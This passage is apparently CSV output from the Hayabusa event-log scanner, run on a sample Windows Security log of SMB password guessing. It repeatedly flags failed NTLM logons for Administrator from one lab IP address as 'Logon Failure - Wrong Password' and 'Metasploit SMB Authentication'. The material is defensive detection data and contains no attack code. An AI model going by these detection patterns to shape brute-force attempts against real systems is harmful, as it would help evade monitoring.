Password,User: Administrator : Type: 3 : Workstation: egEpV9aAuCFjwx2I : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.637 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.677 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: th0ZLWF4YeOaNnkK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.677 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.712 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ahrOLfdy6DCQ9SfO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.712 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.751 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xiooSdP5eib8PUE3 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.751 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.794 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: s6nQ2jp9IGYnGeyD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.794 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.839 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ejMtyR5QNdJFhw1W : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.839 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.873 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: e50kO0aVhfw5np5T : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.873 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.913 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 176XyLw6IhEI6NuD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.913 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.956 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KXCzCSSFvpbWNJFd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.956 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.993 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XhHRuZYlH8hekaKc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.993 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.026 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: ZGIUBFRMQ3OBbOA0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.026 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.077 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: R7CTT5g1w58eRRlS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.077 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.117 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JmVccmad66uOK9ox : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.117 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.163 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: t1jlT6kEcs14dcNZ : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.163 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.209 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rBty5jOGkkZSZEyD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.209 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.245 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0Ci7YUsO5MtFkDSW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.245 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.347 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 12JToliq9mmAuMTQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.347 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.381 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lw9AgAvBGWoXBlim : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.381 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.418 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ReGDyvRpGknAKqqB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.418 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.469 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6mdUn8na4asRfpJP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.469 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.528 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: b7Wm5p4HnNCbkyh2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.528 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.585 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MQZwerVd6E08X8Ou : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.585 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.625 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dbDjtLKoX5Q77bn5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.625 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.669 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: O7BNKHiPjzJKCaDk : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.669 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.714 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HHqBI8bzZn5VO9gq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.714 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.757 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Xz2ZO3b3QSh6Rdqt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.757 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.797 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IEfdhrwbTfCpCXKC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.797 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.844 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kc0LuQzAmQTIF1X3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.844 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.896 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WMZ70YmzpVp2h8mY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.896 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.945 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FFVr3Amq6mA3umiu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.945 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.985 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: hnN15vqZcww8pqTK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.985 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.027 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sSuMRF1txQ9g2Mwi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.027 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.073 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tUuapChhs4CGO1cS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.073 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.119 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dIMr0hjIkwD8AaEG : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.119 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.173 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8ww9HMQX0cqmolYQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.173 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.210 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XJRRZ5e9lARVZDar : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.210 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.260 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VvUzVoSLqFPAXSWE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.260 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.304 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SMMgPu1VJIjAWPDW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.304 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.337 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I1JjIa4nOKDTLuAD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.337 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.377 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0J0GJIm1UUXHH9QJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.377 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.419 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: YmVX3xIz0hrQFvPr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.419 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.470 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nv4tKFEmHjiXkVDI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.470 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.500 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: esdHHJl9LBek9pIo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.500 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.545 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MWofwwLjwiyBk39P : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.545 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.589 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dvsHFZe7Z1uJ9Dkv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.589 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.629 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8aDdgwvb1zsZF79k : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.629 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.668 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AQUb6CnMUtyrMNhF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.668 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
